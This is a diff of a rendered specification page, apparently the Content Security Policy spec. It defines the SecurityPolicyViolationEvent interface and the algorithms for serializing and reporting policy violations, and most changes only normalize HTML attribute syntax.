+<span class="kt">interface</span> <dfn class="nv dfn-paneled idl-code" data-dfn-type="interface" data-export="" id="securitypolicyviolationevent"><code>SecurityPolicyViolationEvent</code></dfn> : <a class="n" data-link-type="idl-name" href="https://dom.spec.whatwg.org/#event" id="ref-for-event">Event</a> {
+    <span class="kt">readonly</span>    <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString④"><span class="kt">USVString</span></a>      <dfn class="nv dfn-paneled idl-code" data-dfn-for="SecurityPolicyViolationEvent" data-dfn-type="attribute" data-export="" data-readonly="" data-type="USVString" id="dom-securitypolicyviolationevent-documenturl"><code>documentURL</code></dfn>;
+    <span class="kt">readonly</span>    <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString⑤"><span class="kt">USVString</span></a>      <a class="nv idl-code" data-link-type="attribute" data-readonly="" data-type="USVString" href="#dom-securitypolicyviolationevent-documenturi" id="ref-for-dom-securitypolicyviolationevent-documenturi">documentURI</a>; // historical alias of documentURL
+    <span class="kt">readonly</span>    <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString⑥"><span class="kt">USVString</span></a>      <dfn class="nv dfn-paneled idl-code" data-dfn-for="SecurityPolicyViolationEvent" data-dfn-type="attribute" data-export="" data-readonly="" data-type="USVString" id="dom-securitypolicyviolationevent-referrer"><code>referrer</code></dfn>;
+    <span class="kt">readonly</span>    <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString⑦"><span class="kt">USVString</span></a>      <dfn class="nv dfn-paneled idl-code" data-dfn-for="SecurityPolicyViolationEvent" data-dfn-type="attribute" data-export="" data-readonly="" data-type="USVString" id="dom-securitypolicyviolationevent-blockedurl"><code>blockedURL</code></dfn>;
+    <span class="kt">readonly</span>    <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString⑧"><span class="kt">USVString</span></a>      <a class="nv idl-code" data-link-type="attribute" data-readonly="" data-type="USVString" href="#dom-securitypolicyviolationevent-blockeduri" id="ref-for-dom-securitypolicyviolationevent-blockeduri">blockedURI</a>; // historical alias of blockedURL
+    <span class="kt">readonly</span>    <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-DOMString" id="ref-for-idl-DOMString④"><span class="kt">DOMString</span></a>      <dfn class="nv dfn-paneled idl-code" data-dfn-for="SecurityPolicyViolationEvent" data-dfn-type="attribute" data-export="" data-readonly="" data-type="DOMString" id="dom-securitypolicyviolationevent-effectivedirective"><code>effectiveDirective</code></dfn>;
+    <span class="kt">readonly</span>    <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-DOMString" id="ref-for-idl-DOMString⑤"><span class="kt">DOMString</span></a>      <a class="nv idl-code" data-link-type="attribute" data-readonly="" data-type="DOMString" href="#dom-securitypolicyviolationevent-violateddirective" id="ref-for-dom-securitypolicyviolationevent-violateddirective">violatedDirective</a>; // historical alias of effectiveDirective
+    <span class="kt">readonly</span>    <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-DOMString" id="ref-for-idl-DOMString⑥"><span class="kt">DOMString</span></a>      <dfn class="nv dfn-paneled idl-code" data-dfn-for="SecurityPolicyViolationEvent" data-dfn-type="attribute" data-export="" data-readonly="" data-type="DOMString" id="dom-securitypolicyviolationevent-originalpolicy"><code>originalPolicy</code></dfn>;
+    <span class="kt">readonly</span>    <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString⑨"><span class="kt">USVString</span></a>      <dfn class="nv dfn-paneled idl-code" data-dfn-for="SecurityPolicyViolationEvent" data-dfn-type="attribute" data-export="" data-readonly="" data-type="USVString" id="dom-securitypolicyviolationevent-sourcefile"><code>sourceFile</code></dfn>;
+    <span class="kt">readonly</span>    <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-DOMString" id="ref-for-idl-DOMString⑦"><span class="kt">DOMString</span></a>      <dfn class="nv dfn-paneled idl-code" data-dfn-for="SecurityPolicyViolationEvent" data-dfn-type="attribute" data-export="" data-readonly="" data-type="DOMString" id="dom-securitypolicyviolationevent-sample"><code>sample</code></dfn>;
+    <span class="kt">readonly</span>    <span class="kt">attribute</span> <a class="n" data-link-type="idl-name" href="#enumdef-securitypolicyviolationeventdisposition" id="ref-for-enumdef-securitypolicyviolationeventdisposition①">SecurityPolicyViolationEventDisposition</a>      <dfn class="nv dfn-paneled idl-code" data-dfn-for="SecurityPolicyViolationEvent" data-dfn-type="attribute" data-export="" data-readonly="" data-type="SecurityPolicyViolationEventDisposition" id="dom-securitypolicyviolationevent-disposition"><code>disposition</code></dfn>;
+    <span class="kt">readonly</span>    <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-unsigned-short" id="ref-for-idl-unsigned-short①"><span class="kt">unsigned</span> <span class="kt">short</span></a> <dfn class="nv dfn-paneled idl-code" data-dfn-for="SecurityPolicyViolationEvent" data-dfn-type="attribute" data-export="" data-readonly="" data-type="unsigned short" id="dom-securitypolicyviolationevent-statuscode"><code>statusCode</code></dfn>;
+    <span class="kt">readonly</span>    <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-unsigned-long" id="ref-for-idl-unsigned-long②"><span class="kt">unsigned</span> <span class="kt">long</span></a>  <dfn class="nv dfn-paneled idl-code" data-dfn-for="SecurityPolicyViolationEvent" data-dfn-type="attribute" data-export="" data-readonly="" data-type="unsigned long" id="dom-securitypolicyviolationevent-lineno"><code>lineno</code></dfn>;
+    <span class="kt">readonly</span>    <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-unsigned-long" id="ref-for-idl-unsigned-long③"><span class="kt">unsigned</span> <span class="kt">long</span></a>  <a class="nv idl-code" data-link-type="attribute" data-readonly="" data-type="unsigned long" href="#dom-securitypolicyviolationevent-linenumber" id="ref-for-dom-securitypolicyviolationevent-linenumber">lineNumber</a>; // historical alias of lineno
+    <span class="kt">readonly</span>    <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-unsigned-long" id="ref-for-idl-unsigned-long④"><span class="kt">unsigned</span> <span class="kt">long</span></a>  <dfn class="nv dfn-paneled idl-code" data-dfn-for="SecurityPolicyViolationEvent" data-dfn-type="attribute" data-export="" data-readonly="" data-type="unsigned long" id="dom-securitypolicyviolationevent-colno"><code>colno</code></dfn>;
+    <span class="kt">readonly</span>    <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-unsigned-long" id="ref-for-idl-unsigned-long⑤"><span class="kt">unsigned</span> <span class="kt">long</span></a>  <a class="nv idl-code" data-link-type="attribute" data-readonly="" data-type="unsigned long" href="#dom-securitypolicyviolationevent-columnnumber" id="ref-for-dom-securitypolicyviolationevent-columnnumber">columnNumber</a>; // historical alias of colno
+};
+
+<span class="kt">dictionary</span> <dfn class="nv dfn-paneled idl-code" data-dfn-type="dictionary" data-export="" id="dictdef-securitypolicyviolationeventinit"><code>SecurityPolicyViolationEventInit</code></dfn> : <a class="n" data-link-type="idl-name" href="https://dom.spec.whatwg.org/#dictdef-eventinit" id="ref-for-dictdef-eventinit">EventInit</a> {
+    <span class="kt">required</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString①⓪"><span class="kt">USVString</span></a>      <dfn class="nv idl-code" data-dfn-for="SecurityPolicyViolationEventInit" data-dfn-type="dict-member" data-export="" data-type="USVString      " id="dom-securitypolicyviolationeventinit-documenturl"><code>documentURL</code><a class="self-link" href="#dom-securitypolicyviolationeventinit-documenturl"></a></dfn>;
+             <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString①①"><span class="kt">USVString</span></a>      <dfn class="nv idl-code" data-default="&quot;&quot;" data-dfn-for="SecurityPolicyViolationEventInit" data-dfn-type="dict-member" data-export="" data-type="USVString      " id="dom-securitypolicyviolationeventinit-referrer"><code>referrer</code><a class="self-link" href="#dom-securitypolicyviolationeventinit-referrer"></a></dfn> = "";
+             <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString①②"><span class="kt">USVString</span></a>      <dfn class="nv idl-code" data-default="&quot;&quot;" data-dfn-for="SecurityPolicyViolationEventInit" data-dfn-type="dict-member" data-export="" data-type="USVString      " id="dom-securitypolicyviolationeventinit-blockedurl"><code>blockedURL</code><a class="self-link" href="#dom-securitypolicyviolationeventinit-blockedurl"></a></dfn> = "";
+    <span class="kt">required</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-DOMString" id="ref-for-idl-DOMString⑧"><span class="kt">DOMString</span></a>      <dfn class="nv idl-code" data-dfn-for="SecurityPolicyViolationEventInit" data-dfn-type="dict-member" data-export="" data-type="DOMString      " id="dom-securitypolicyviolationeventinit-effectivedirective"><code>effectiveDirective</code><a class="self-link" href="#dom-securitypolicyviolationeventinit-effectivedirective"></a></dfn>;
+    <span class="kt">required</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-DOMString" id="ref-for-idl-DOMString⑨"><span class="kt">DOMString</span></a>      <dfn class="nv idl-code" data-dfn-for="SecurityPolicyViolationEventInit" data-dfn-type="dict-member" data-export="" data-type="DOMString      " id="dom-securitypolicyviolationeventinit-originalpolicy"><code>originalPolicy</code><a class="self-link" href="#dom-securitypolicyviolationeventinit-originalpolicy"></a></dfn>;
+             <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString①③"><span class="kt">USVString</span></a>      <dfn class="nv idl-code" data-default="&quot;&quot;" data-dfn-for="SecurityPolicyViolationEventInit" data-dfn-type="dict-member" data-export="" data-type="USVString      " id="dom-securitypolicyviolationeventinit-sourcefile"><code>sourceFile</code><a class="self-link" href="#dom-securitypolicyviolationeventinit-sourcefile"></a></dfn> = "";
+             <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-DOMString" id="ref-for-idl-DOMString①⓪"><span class="kt">DOMString</span></a>      <dfn class="nv idl-code" data-default="&quot;&quot;" data-dfn-for="SecurityPolicyViolationEventInit" data-dfn-type="dict-member" data-export="" data-type="DOMString      " id="dom-securitypolicyviolationeventinit-sample"><code>sample</code><a class="self-link" href="#dom-securitypolicyviolationeventinit-sample"></a></dfn> = "";
+    <span class="kt">required</span> <a class="n" data-link-type="idl-name" href="#enumdef-securitypolicyviolationeventdisposition" id="ref-for-enumdef-securitypolicyviolationeventdisposition②">SecurityPolicyViolationEventDisposition</a> <dfn class="nv idl-code" data-dfn-for="SecurityPolicyViolationEventInit" data-dfn-type="dict-member" data-export="" data-type="SecurityPolicyViolationEventDisposition " id="dom-securitypolicyviolationeventinit-disposition"><code>disposition</code><a class="self-link" href="#dom-securitypolicyviolationeventinit-disposition"></a></dfn>;
+    <span class="kt">required</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-unsigned-short" id="ref-for-idl-unsigned-short②"><span class="kt">unsigned</span> <span class="kt">short</span></a> <dfn class="nv idl-code" data-dfn-for="SecurityPolicyViolationEventInit" data-dfn-type="dict-member" data-export="" data-type="unsigned short " id="dom-securitypolicyviolationeventinit-statuscode"><code>statusCode</code><a class="self-link" href="#dom-securitypolicyviolationeventinit-statuscode"></a></dfn>;
+             <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-unsigned-long" id="ref-for-idl-unsigned-long⑥"><span class="kt">unsigned</span> <span class="kt">long</span></a>  <dfn class="nv idl-code" data-default="0" data-dfn-for="SecurityPolicyViolationEventInit" data-dfn-type="dict-member" data-export="" data-type="unsigned long  " id="dom-securitypolicyviolationeventinit-lineno"><code>lineno</code><a class="self-link" href="#dom-securitypolicyviolationeventinit-lineno"></a></dfn> = 0;
+             <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-unsigned-long" id="ref-for-idl-unsigned-long⑦"><span class="kt">unsigned</span> <span class="kt">long</span></a>  <dfn class="nv idl-code" data-default="0" data-dfn-for="SecurityPolicyViolationEventInit" data-dfn-type="dict-member" data-export="" data-type="unsigned long  " id="dom-securitypolicyviolationeventinit-colno"><code>colno</code><a class="self-link" href="#dom-securitypolicyviolationeventinit-colno"></a></dfn> = 0;
+};
+</pre>
+    <p>The <dfn class="dfn-paneled idl-code" data-dfn-for="SecurityPolicyViolationEvent" data-dfn-type="attribute" data-export="" id="dom-securitypolicyviolationevent-documenturi"><code>documentURI</code></dfn> attribute’s
   getter must return the value of the object’s <code class="idl"><a data-link-type="idl" href="#dom-securitypolicyviolationevent-documenturl" id="ref-for-dom-securitypolicyviolationevent-documenturl">documentURL</a></code> property.</p>
-    <p>The <dfn class="dfn-paneled idl-code" data-dfn-for="SecurityPolicyViolationEvent" data-dfn-type="attribute" data-export id="dom-securitypolicyviolationevent-blockeduri"><code>blockedURI</code></dfn> attribute’s
+    <p>The <dfn class="dfn-paneled idl-code" data-dfn-for="SecurityPolicyViolationEvent" data-dfn-type="attribute" data-export="" id="dom-securitypolicyviolationevent-blockeduri"><code>blockedURI</code></dfn> attribute’s
   getter must return the value of the object’s <code class="idl"><a data-link-type="idl" href="#dom-securitypolicyviolationevent-blockedurl" id="ref-for-dom-securitypolicyviolationevent-blockedurl">blockedURL</a></code> property.</p>
-    <p>The <dfn class="dfn-paneled idl-code" data-dfn-for="SecurityPolicyViolationEvent" data-dfn-type="attribute" data-export id="dom-securitypolicyviolationevent-violateddirective"><code>violatedDirective</code></dfn> attribute’s
+    <p>The <dfn class="dfn-paneled idl-code" data-dfn-for="SecurityPolicyViolationEvent" data-dfn-type="attribute" data-export="" id="dom-securitypolicyviolationevent-violateddirective"><code>violatedDirective</code></dfn> attribute’s
   getter must return the value of the object’s <code class="idl"><a data-link-type="idl" href="#dom-securitypolicyviolationevent-effectivedirective" id="ref-for-dom-securitypolicyviolationevent-effectivedirective">effectiveDirective</a></code> property.</p>
-    <p>The <dfn class="dfn-paneled idl-code" data-dfn-for="SecurityPolicyViolationEvent" data-dfn-type="attribute" data-export id="dom-securitypolicyviolationevent-linenumber"><code>lineNumber</code></dfn> attribute’s
+    <p>The <dfn class="dfn-paneled idl-code" data-dfn-for="SecurityPolicyViolationEvent" data-dfn-type="attribute" data-export="" id="dom-securitypolicyviolationevent-linenumber"><code>lineNumber</code></dfn> attribute’s
   getter must return the value of the object’s <code class="idl"><a data-link-type="idl" href="#dom-securitypolicyviolationevent-lineno" id="ref-for-dom-securitypolicyviolationevent-lineno">lineno</a></code> property.</p>
-    <p>The <dfn class="dfn-paneled idl-code" data-dfn-for="SecurityPolicyViolationEvent" data-dfn-type="attribute" data-export id="dom-securitypolicyviolationevent-columnnumber"><code>columnNumber</code></dfn> attribute’s
+    <p>The <dfn class="dfn-paneled idl-code" data-dfn-for="SecurityPolicyViolationEvent" data-dfn-type="attribute" data-export="" id="dom-securitypolicyviolationevent-columnnumber"><code>columnNumber</code></dfn> attribute’s
   getter must return the value of the object’s <code class="idl"><a data-link-type="idl" href="#dom-securitypolicyviolationevent-colno" id="ref-for-dom-securitypolicyviolationevent-colno">colno</a></code> property.</p>
     <h3 class="heading settled" data-level="5.2" id="deprecated-serialize-violation"><span class="secno">5.2. </span><span class="content"> Obtain the deprecated serialization of <var>violation</var> </span><a class="self-link" href="#deprecated-serialize-violation"></a></h3>
     <p>Given a <a data-link-type="dfn" href="#violation" id="ref-for-violation①⑦">violation</a> (<var>violation</var>), this algorithm returns a JSON text
   string representation of the violation, suitable for submission to a reporting
   endpoint associated with the deprecated <a data-link-type="dfn" href="#report-uri" id="ref-for-report-uri"><code>report-uri</code></a> directive.</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>object</var> be a new JavaScript object with properties initialized as
   follows:</p>
       <dl>
-       <dt data-md>"<code>document-url</code>"
-       <dd data-md>
+       <dt data-md="">"<code>document-url</code>"
+       <dd data-md="">
         <p>The result of executing the <a data-link-type="dfn" href="https://url.spec.whatwg.org/#concept-url-serializer" id="ref-for-concept-url-serializer">URL serializer</a> on <var>violation</var>’s <a data-link-type="dfn" href="#violation-url" id="ref-for-violation-url">url</a>, with the <code>exclude fragment</code> flag set.</p>
-       <dt data-md>"<code>document-uri</code>"
-       <dd data-md>
+       <dt data-md="">"<code>document-uri</code>"
+       <dd data-md="">
         <p>A copy of the "<code>document-url</code>" property, kept for historical reasons</p>
-       <dt data-md>"<code>referrer</code>"
-       <dd data-md>
+       <dt data-md="">"<code>referrer</code>"
+       <dd data-md="">
         <p>The result of executing the <a data-link-type="dfn" href="https://url.spec.whatwg.org/#concept-url-serializer" id="ref-for-concept-url-serializer①">URL serializer</a> on <var>violation</var>’s <a data-link-type="dfn" href="#violation-referrer" id="ref-for-violation-referrer①">referrer</a>, with the <code>exclude fragment</code> flag set.</p>
-       <dt data-md>"<code>blocked-url</code>"
-       <dd data-md>
+       <dt data-md="">"<code>blocked-url</code>"
+       <dd data-md="">
         <p>The result of executing the <a data-link-type="dfn" href="https://url.spec.whatwg.org/#concept-url-serializer" id="ref-for-concept-url-serializer②">URL serializer</a> on <var>violation</var>’s <a data-link-type="dfn" href="#violation-resource" id="ref-for-violation-resource⑧">resource</a>, with the <code>exclude fragment</code> flag set.</p>
-       <dt data-md>"<code>blocked-uri</code>"
-       <dd data-md>
+       <dt data-md="">"<code>blocked-uri</code>"
+       <dd data-md="">
         <p>A copy of the "<code>blocked-url</code>" property, kept for historical reasons</p>
-       <dt data-md>"<code>effective-directive</code>"
-       <dd data-md>
+       <dt data-md="">"<code>effective-directive</code>"
+       <dd data-md="">
         <p><var>violation</var>’s <a data-link-type="dfn" href="#violation-effective-directive" id="ref-for-violation-effective-directive①">effective directive</a></p>
-       <dt data-md>"<code>violated-directive</code>"
-       <dd data-md>
+       <dt data-md="">"<code>violated-directive</code>"
+       <dd data-md="">
         <p>A copy of the "<code>effective-directive</code>" property, kept for historical reasons</p>
-       <dt data-md>"<code>original-policy</code>"
-       <dd data-md>
+       <dt data-md="">"<code>original-policy</code>"
+       <dd data-md="">
         <p>The <a data-link-type="dfn" href="#serialized-csp" id="ref-for-serialized-csp⑦">serialization</a> of <var>violation</var>’s <a data-link-type="dfn" href="#violation-policy" id="ref-for-violation-policy①">policy</a></p>
-       <dt data-md>"<code>disposition</code>"
-       <dd data-md>
+       <dt data-md="">"<code>disposition</code>"
+       <dd data-md="">
         <p>The <a data-link-type="dfn" href="#policy-disposition" id="ref-for-policy-disposition①⑦">disposition</a> of <var>violation</var>’s <a data-link-type="dfn" href="#violation-policy" id="ref-for-violation-policy②">policy</a></p>
-       <dt data-md>"<code>status-code</code>"
-       <dd data-md>
+       <dt data-md="">"<code>status-code</code>"
+       <dd data-md="">
         <p><var>violation</var>’s <a data-link-type="dfn" href="#violation-status" id="ref-for-violation-status①">status</a></p>
-       <dt data-md>"<code>script-sample</code>"
-       <dd data-md>
+       <dt data-md="">"<code>script-sample</code>"
+       <dd data-md="">
         <p><var>violation</var>’s <a data-link-type="dfn" href="#violation-sample" id="ref-for-violation-sample④">sample</a></p>
         <p class="note" role="note"><span>Note:</span> The name <code>script-sample</code> was chosen for compatibility with an earlier iteration of
   this feature which has shipped in Firefox since its initial implementation of CSP. Despite
@@ -3017,167 +2986,167 @@ ISSUE: Bikeshed <code>unsafe-allow-redirects</code>.
   data contained in a <code class="idl"><a data-link-type="idl" href="#securitypolicyviolationevent" id="ref-for-securitypolicyviolationevent">SecurityPolicyViolationEvent</a></code> object, and in reports generated via
   the new <a data-link-type="dfn" href="#report-to" id="ref-for-report-to"><code>report-to</code></a> directive, is named in a more encompassing fashion: <code class="idl"><a data-link-type="idl" href="#dom-securitypolicyviolationevent-sample" id="ref-for-dom-securitypolicyviolationevent-sample">sample</a></code>.</p>
       </dl>
-     <li data-md>
+     <li data-md="">
       <p>If <var>violation</var>’s <a data-link-type="dfn" href="#violation-source-file" id="ref-for-violation-source-file②">source file</a> is not <code>null</code>:</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p>Set <var>object</var>’s "<code>source-file</code>" property to the result of executing
   the <a data-link-type="dfn" href="https://url.spec.whatwg.org/#concept-url-serializer" id="ref-for-concept-url-serializer③">URL serializer</a> on <var>violation</var>’s <a data-link-type="dfn" href="#violation-source-file" id="ref-for-violation-source-file③">source
   file</a>, with the <code>exclude fragment</code> flag set.</p>
-       <li data-md>
+       <li data-md="">
         <p>Set <var>object</var>’s "<code>lineno</code>" property to <var>violation</var>’s <a data-link-type="dfn" href="#violation-line-number" id="ref-for-violation-line-number①">line number</a>.</p>
-       <li data-md>
+       <li data-md="">
         <p>Set <var>object</var>’s "<code>line-number</code>" property to <var>violation</var>’s <a data-link-type="dfn" href="#violation-line-number" id="ref-for-violation-line-number②">line number</a>.</p>
-       <li data-md>
+       <li data-md="">
         <p>Set <var>object</var>’s "<code>colno</code>" property to <var>violation</var>’s <a data-link-type="dfn" href="#violation-column-number" id="ref-for-violation-column-number①">column number</a>.</p>
-       <li data-md>
+       <li data-md="">
         <p>Set <var>object</var>’s "<code>column-number</code>" property to <var>violation</var>’s <a data-link-type="dfn" href="#violation-column-number" id="ref-for-violation-column-number②">column number</a>.</p>
         <p class="note" role="note"><span>Note:</span> the "<code>line-number</code>" and "<code>column-number</code>" properties are
   maintained for historical reasons and are duplicates of "<code>lineno</code>"
   and "<code>colno</code>" respectively.</p>
       </ol>
-     <li data-md>
+     <li data-md="">
       <p class="assertion">Assert: If <var>object</var>’s "<code>blocked-url</code>" property is not "<code>inline</code>", then its "<code>sample</code>"
   property is the empty string.</p>
-     <li data-md>
+     <li data-md="">
       <p>Return the result of executing <code class="idl"><a data-link-type="idl" href="https://tc39.github.io/ecma262#sec-json.stringify" id="ref-for-sec-json.stringify">JSON.stringify()</a></code> on <var>object</var>.</p>
     </ol>
     <h3 class="heading settled algorithm" data-algorithm="Report a violation" data-level="5.3" id="report-violation"><span class="secno">5.3. </span><span class="content"> Report a <var>violation</var> </span><a class="self-link" href="#report-violation"></a></h3>
     <p>Given a <a data-link-type="dfn" href="#violation" id="ref-for-violation①⑧">violation</a> (<var>violation</var>), this algorithm reports it to the endpoint specified in <var>violation</var>’s <a data-link-type="dfn" href="#violation-policy" id="ref-for-violation-policy③">policy</a>, and fires a <code class="idl"><a data-link-type="idl" href="#securitypolicyviolationevent" id="ref-for-securitypolicyviolationevent①">SecurityPolicyViolationEvent</a></code> at <var>violation</var>’s <a data-link-type="dfn" href="#violation-element" id="ref-for-violation-element①">element</a>, or at <var>violation</var>’s <a data-link-type="dfn" href="#violation-global-object" id="ref-for-violation-global-object③">global object</a> as described below:</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>global</var> be <var>violation</var>’s <a data-link-type="dfn" href="#violation-global-object" id="ref-for-violation-global-object④">global object</a>.</p>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>target</var> be <var>violation</var>’s <a data-link-type="dfn" href="#violation-element" id="ref-for-violation-element②">element</a>.</p>
-     <li data-md>
+     <li data-md="">
       <p><a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/webappapis.html#queue-a-task" id="ref-for-queue-a-task">Queue a task</a> to run the following steps:</p>
       <p class="note" role="note"><span>Note:</span> We "queue a task" here to ensure that the event targeting and dispatch
   happens after JavaScript completes execution of the task responsible for a
   given violation (which might manipulate the DOM).</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p>If <var>target</var> is not <code>null</code>, and <var>global</var> is a <code class="idl"><a data-link-type="idl" href="https://html.spec.whatwg.org/multipage/window-object.html#window" id="ref-for-window②">Window</a></code>, and <var>target</var>’s <a data-link-type="dfn" href="https://dom.spec.whatwg.org/#concept-shadow-including-root" id="ref-for-concept-shadow-including-root">shadow-including root</a> is not <var>global</var>’s <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/window-object.html#concept-document-window" id="ref-for-concept-document-window①">associated <code>Document</code></a>, set <var>target</var> to <code>null</code>.</p>
         <p class="note" role="note"><span>Note:</span> This ensures that we fire events only at elements <a data-link-type="dfn" href="https://dom.spec.whatwg.org/#connected" id="ref-for-connected">connected</a> to <var>violation</var>’s <a data-link-type="dfn" href="#violation-policy" id="ref-for-violation-policy④">policy</a>’s <code class="idl"><a data-link-type="idl" href="https://dom.spec.whatwg.org/#document" id="ref-for-document①②">Document</a></code>. If a
   violation is caused by an element which isn’t connected to that
   document, we’ll fire the event at the document rather than the element
   in order to ensure that the violation is visible to the document’s
   listeners.</p>
-       <li data-md>
+       <li data-md="">
         <p>If <var>target</var> is <code>null</code>:</p>
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>Set <var>target</var> be <var>violation</var>’s <a data-link-type="dfn" href="#violation-global-object" id="ref-for-violation-global-object⑤">global object</a>.</p>
-         <li data-md>
+         <li data-md="">
           <p>If <var>target</var> is a <code class="idl"><a data-link-type="idl" href="https://html.spec.whatwg.org/multipage/window-object.html#window" id="ref-for-window③">Window</a></code>, set <var>target</var> to <var>target</var>’s <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/window-object.html#concept-document-window" id="ref-for-concept-document-window②">associated <code>Document</code></a>.</p>
         </ol>
-       <li data-md>
+       <li data-md="">
         <p><a data-link-type="dfn" href="https://dom.spec.whatwg.org/#concept-event-fire" id="ref-for-concept-event-fire">Fire an event</a> named <code>securitypolicyviolation</code> that uses the <code class="idl"><a data-link-type="idl" href="#securitypolicyviolationevent" id="ref-for-securitypolicyviolationevent②">SecurityPolicyViolationEvent</a></code> interface at <var>target</var> with
   its attributes initialized as follows:</p>
         <dl>
-         <dt data-md><code class="idl"><a data-link-type="idl" href="#dom-securitypolicyviolationevent-documenturl" id="ref-for-dom-securitypolicyviolationevent-documenturl①">documentURL</a></code>
-         <dd data-md>
+         <dt data-md=""><code class="idl"><a data-link-type="idl" href="#dom-securitypolicyviolationevent-documenturl" id="ref-for-dom-securitypolicyviolationevent-documenturl①">documentURL</a></code>
+         <dd data-md="">
           <p>The result of executing the <a data-link-type="dfn" href="https://url.spec.whatwg.org/#concept-url-serializer" id="ref-for-concept-url-serializer④">URL serializer</a> on <var>violation</var>’s <a data-link-type="dfn" href="#violation-url" id="ref-for-violation-url①">url</a>, with the <code>exclude fragment</code> flag set.</p>
-         <dt data-md><code class="idl"><a data-link-type="idl" href="#dom-securitypolicyviolationevent-referrer" id="ref-for-dom-securitypolicyviolationevent-referrer">referrer</a></code>
-         <dd data-md>
+         <dt data-md=""><code class="idl"><a data-link-type="idl" href="#dom-securitypolicyviolationevent-referrer" id="ref-for-dom-securitypolicyviolationevent-referrer">referrer</a></code>
+         <dd data-md="">
           <p>The result of executing the <a data-link-type="dfn" href="https://url.spec.whatwg.org/#concept-url-serializer" id="ref-for-concept-url-serializer⑤">URL serializer</a> on <var>violation</var>’s <a data-link-type="dfn" href="#violation-referrer" id="ref-for-violation-referrer②">referrer</a>, with the <code>exclude fragment</code> flag set.</p>
-         <dt data-md><code class="idl"><a data-link-type="idl" href="#dom-securitypolicyviolationevent-blockedurl" id="ref-for-dom-securitypolicyviolationevent-blockedurl①">blockedURL</a></code>
-         <dd data-md>
+         <dt data-md=""><code class="idl"><a data-link-type="idl" href="#dom-securitypolicyviolationevent-blockedurl" id="ref-for-dom-securitypolicyviolationevent-blockedurl①">blockedURL</a></code>
+         <dd data-md="">
           <p>The result of executing the <a data-link-type="dfn" href="https://url.spec.whatwg.org/#concept-url-serializer" id="ref-for-concept-url-serializer⑥">URL serializer</a> on <var>violation</var>’s <a data-link-type="dfn" href="#violation-resource" id="ref-for-violation-resource⑨">resource</a>, with the <code>exclude fragment</code> flag set.</p>
-         <dt data-md><code class="idl"><a data-link-type="idl" href="#dom-securitypolicyviolationevent-effectivedirective" id="ref-for-dom-securitypolicyviolationevent-effectivedirective①">effectiveDirective</a></code>
-         <dd data-md>
+         <dt data-md=""><code class="idl"><a data-link-type="idl" href="#dom-securitypolicyviolationevent-effectivedirective" id="ref-for-dom-securitypolicyviolationevent-effectivedirective①">effectiveDirective</a></code>
+         <dd data-md="">
           <p><var>violation</var>’s <a data-link-type="dfn" href="#violation-effective-directive" id="ref-for-violation-effective-directive②">effective directive</a></p>
-         <dt data-md><code class="idl"><a data-link-type="idl" href="#dom-securitypolicyviolationevent-originalpolicy" id="ref-for-dom-securitypolicyviolationevent-originalpolicy">originalPolicy</a></code>
-         <dd data-md>
+         <dt data-md=""><code class="idl"><a data-link-type="idl" href="#dom-securitypolicyviolationevent-originalpolicy" id="ref-for-dom-securitypolicyviolationevent-originalpolicy">originalPolicy</a></code>
+         <dd data-md="">
           <p>The <a data-link-type="dfn" href="#serialized-csp" id="ref-for-serialized-csp⑧">serialization</a> of <var>violation</var>’s <a data-link-type="dfn" href="#violation-policy" id="ref-for-violation-policy⑤">policy</a></p>
-         <dt data-md><code class="idl"><a data-link-type="idl" href="#dom-securitypolicyviolationevent-disposition" id="ref-for-dom-securitypolicyviolationevent-disposition">disposition</a></code>
-         <dd data-md>
